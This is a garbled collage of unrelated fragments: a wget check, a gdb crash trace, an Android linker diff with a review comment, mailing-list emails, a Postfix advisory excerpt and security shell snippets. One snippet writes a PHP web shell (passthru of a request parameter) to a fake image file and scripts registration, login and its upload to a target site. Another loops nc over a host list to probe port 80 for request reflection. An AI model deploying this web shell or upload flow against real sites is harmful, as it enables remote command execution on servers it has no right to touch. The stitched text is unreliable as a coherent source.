// OK, it is; let's register the IP in a variable for later use:
$ GoogleHost=74.125.65.106
// Let's verify it is working now:
$ wget http://$GoogleHost/ -O /dev/null -T 5
--2009-08-16 21:15:05-- http://74.125.65.106/
Connecting to 74.125.65.106:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: `/dev/null'
echo "<? print passthru(\$_REQUEST['cmd']); ?>" > evilimage.jpg.php
echo "Registering user"
curl -c cookiejar -d "user=hacker&pass=31337&email=foo%40bar.com&company_name=&first_name=Hack&last_name=Errr&phone=123+123+1234&alt_phone=&fax=&country=1&state=Badakhshan&city=&address=&zip=&submit=Submit&agree=agree" "$target/register.php" >/dev/null 2>&1
echo "Login"
curl -b cookiejar -c cookiejar -d "user=hacker&pass=31337&submit=Login" "$target/login.php" >/dev/null 2>&1
echo "Upload command shell as user image"
curl -b cookiejar -c cookiejar -F "image=@evilimage.jpg.php" -F
Program received signal SIGSEGV, Segmentation fault.
0x08051c03 in ?? ()
(gdb) x/i $eip
0x8051c03: push %ebx
# find Y CX >> /dev/null
Segmentation fault (core dumped)
find(1) also fails!
+++ b/linker/linker.c
@@ -1563,13 +1563,13 @@ static int link_image(soinfo *si, unsigned wr_offset)
}
#endif
- /* If this is a SETUID programme, dup /dev/null to openned stdin,
+ /* If this is a SET?ID program, dup /dev/null to openned stdin,
stdout and stderr to close a security hole described in:
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-02:23.stdio.asc
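Review bot: the rewritten comment line still carries the typo "openned" (should be "opened"); since the `+` line already rewords "SETUID programme" to "SET?ID program", fix both in the same edit: `+ /* If this is a SET?ID program, dup /dev/null to opened stdin,`. Consider also spelling out "setuid/setgid" instead of the "SET?ID" shorthand so the broadened intent of the comment is clear to anyone grepping linker.c.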
>
> Thank you for your time and look forward to some more answers.
>
> Sincerely,
> Aras "Russ" Memisyazici
> arasm {at) vt ^dot^ edu --> I set my return addy to /dev/null for... well
> you know why!
>
> Systems Administrator
> Virginia Tech
>
"Extended Support Phase" includes "Security Update Support". If I have
a Premier Support contract (which entitles me to Extended Support)
aren't MS contractually obliged to make this fix available to me?
2009/9/16 Aras "Russ" Memisyazici <nowhere@devnull.com>:
> :)
>
> Thank you all for your valuable comments... Indeed I appreciated some of the
> links/info extended (Susan, Thor and Tom). However, in the end, it sounded
> like:
fi
# Read one host per line from the file given as $1 and probe port 80 of each.
for i in $(cat "$1")
do
  # Send a request whose request line carries a marker and which repeats the
  # Content-length header; if the marker is echoed back in the response, the
  # server reflects the request and is reported as vulnerable.
  if echo -en "<PROCHECKUP> / HTTP/1.1\nHost: $i\nConnection: close\nContent-length: 0\nContent-length: 0\n\n" | nc -w 4 "$i" 80 | grep -i '<PROCHECKUP>' > /dev/null
  then
    echo "$i is VULNERABLE!"
  fi
done
on current Solaris, IRIX and Linux systems. On systems with this
non-standard behavior, Postfix may be vulnerable depending on how
it is configured.
Postfix allows a root-owned symlink as a local mail destination,
so that mail can be delivered to e.g. /dev/null which is a symlink
on Solaris.
2. What configurations are (not) affected
=========================================
A configuration is considered affected when an attacker with local